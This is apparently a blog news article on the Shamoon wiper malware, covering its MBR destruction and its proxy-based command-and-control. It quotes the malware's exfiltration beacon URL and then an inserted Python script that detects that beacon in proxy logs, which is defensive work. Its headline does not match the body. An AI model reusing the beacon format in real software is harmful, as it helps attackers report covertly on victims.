New Virus Turns Your Computer Into a Republican

Pic courtesy of Business Insider.

Reports of the ‘Shamoon’ malware began emerging from security companies on Thursday. Like other malware, it steals information, taking data from the ‘Users’, ‘Documents and Settings’, and ‘System32/Drivers’ and ‘System32/Config’ folders on Windows computers. One unusual characteristic, however, is that it can overwrite the master boot record (MBR) on infected machines, effectively rendering them useless.

According to ZDNet,

Shamoon, which is also known as Disttrack, is being used in targeted attacks against at least one organization in the energy sector, according to Symantec.

“Threats with such destructive payloads are unusual and are not typical of targeted attacks,” Symantec wrote on its security response blog on Friday. “Security response is continuing to analyse this threat and will post more information as it becomes available.”

The malware consists of a 900KB folder that contains a number of “encrypted resources”, according to Kaspersky Labs. One of these has a signed disk driver from EldoS, a corporate security component provider, which is used for raw disk access by the malware’s components.

It affects Windows 95, Windows 98, Windows XP, Windows 2000, Windows Vista, Windows NT, Windows ME, Windows 7, Windows Server 2003 and Windows Server 2008. Symantec said it has updated its antivirus to protect against the malware.

In an analysis, malware detection company Seculert concluded that Shamoon uses a two-stage attack. First it infects a computer connected to the internet and turns this into a proxy to communicate back with the malware’s command-and-control server. After that, it branches out to other computers on the corporate network, steals information, then executes its payload and wipes the machines. Finally, it communicates this to the external command-and-control server.

“It is still unclear who is behind this attack,” Seculert wrote in a blog post. “We will update this blog with more information when it becomes available.”

According to Gizmodo, this new virus contains a file named Wiper, which the Flame virus also has. But the Wiper file in Shamoon doesn’t share the same code as the one in Flame, which is why experts suspect a copycat is at work. Specifically, Kaspersky believes it’s the doing of script kiddies. Shamoon, like Flame, reportedly collects data on any machine it infects, then proceeds to erase the disk. But taking things one step further, the virus then overwrites the disk with a fragment of a JPEG file, making it nearly impossible to recover the lost data.

Security firm Seculert believes that its recent implementation was a two-stage attack executed from inside.

The attacker took control of an internal machine connected directly to the internet, and used that machine as a proxy to the external Command-and-Control (C2) server. Through the proxy, the attacker infected the other internal machines, which were probably not connected directly to the internet.

Once the intended action on the internal infected machines was complete, the attacker executed the Shamoon malware, wiping all evidence of other malicious software or stolen data from those machines. It then reported back to the external C2 through the proxy.

No one has come out and said specifically what power plant Shamoon worked its destructive powers on, but Ars Technica points out that the Saudi Aramco plant was the victim of an attack last week in Saudi Arabia. What experts do know is that Shamoon is definitely part of a targeted attack. What they don’t know is who. Or why.

What’s strange about Shamoon, however, is that it doesn’t appear to be collecting any sensitive info like Flame, which sniffed out passwords, documents and anything else vital to the operation of the Iranian facilities. Instead, Symantec says Shamoon is only concerned with reporting the names of the files it deleted, how many files it deleted, and the IP address of the computers infected. Destruction seems to be the primary objective.

The Reporter component is responsible for sending infection information back to the attacker. Information is sent as an HTTP GET request and is structured as follows:
http://[DOMAIN]/ajax_modal/modal/data.asp?mydata=[MYDATA]&uid=[UID]&state=[STATE]

The following data is sent to the attacker:

[DOMAIN] - a domain name
[MYDATA] - a number that specifies how many files were overwritten
[UID] - the IP address of the compromised computer
[STATE] - a random number
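Because the Reporter beacon has such a fixed shape, it is easy to hunt for in web-proxy logs. The following is an added example (not code from the article or from any of the vendors it quotes) that parses constructed proxy log lines, matches the `/ajax_modal/modal/data.asp` path and its three query parameters, and pulls out the fields a responder would want: the C2 domain, the count of overwritten files, and the victim IP. The log format and hostnames are assumed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log lines (not real traffic): "client method url status"
SAMPLE_PROXY_LOG = """\
10.0.0.5 GET http://intranet.example.local/index.html 200
10.0.0.7 GET http://c2.example.invalid/ajax_modal/modal/data.asp?mydata=1532&uid=10.0.0.7&state=48211 200
10.0.0.9 GET http://c2.example.invalid/ajax_modal/modal/data.asp?mydata=7&uid=notanip&state=3 404
10.0.0.3 GET http://cdn.example.invalid/modal/data.asp?x=1 200
"""

# Path and parameter names taken from the Reporter request structure quoted above.
REPORTER_PATH = "/ajax_modal/modal/data.asp"
REQUIRED_PARAMS = ("mydata", "uid", "state")


def parse_reporter_beacon(url):
    """Return a dict of the beacon's fields if url matches the Reporter's GET
    structure, else None. uid must parse as an IP address and mydata/state as
    integers; anything else is treated as an unrelated request."""
    parts = urlsplit(url)
    if parts.path != REPORTER_PATH:
        return None
    qs = parse_qs(parts.query)
    if not all(p in qs for p in REQUIRED_PARAMS):
        return None
    try:
        victim_ip = ipaddress.ip_address(qs["uid"][0])
        overwritten = int(qs["mydata"][0])
        state = int(qs["state"][0])
    except ValueError:
        return None
    return {"domain": parts.hostname, "overwritten_files": overwritten,
            "victim_ip": str(victim_ip), "state": state}


def find_reporter_beacons(log_text):
    """Scan proxy log text and return (client, beacon) pairs for matching GETs.
    A client whose address differs from uid is worth a second look: the
    proxy host in the two-stage model relays beacons for other machines."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[1] != "GET":
            continue
        beacon = parse_reporter_beacon(fields[2])
        if beacon is not None:
            hits.append((fields[0], beacon))
    return hits
```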

Threats with such destructive payloads are unusual and are not typical of targeted attacks.

Maybe the attacker already knows what is on the machines (which would make sense if the attack originated from within), but it still doesn’t explain the motivation for such a risky stunt on the part of a script kiddie.

If this is a non-political attack from an unaffiliated mischief maker, is this only the beginning for this kind of thing? A rash of unprovoked attacks on energy facilities could be downright devastating if properly executed. The immediate fallout might seem minor, and even inconsequential. But as we saw with Anonymous and LulzSec’s hacking spree last fall, an event like this can snowball into something quite harrowing.

Many thanks to Kaspersky, Symantec, and Seculert via Ars Technica for their contributions to this story.


About Post Author

Carol Bell

Carol is a graduate of the University of Alabama. Her passion is journalism and it shows. Carol is our unpaid, but very efficient, administrative secretary.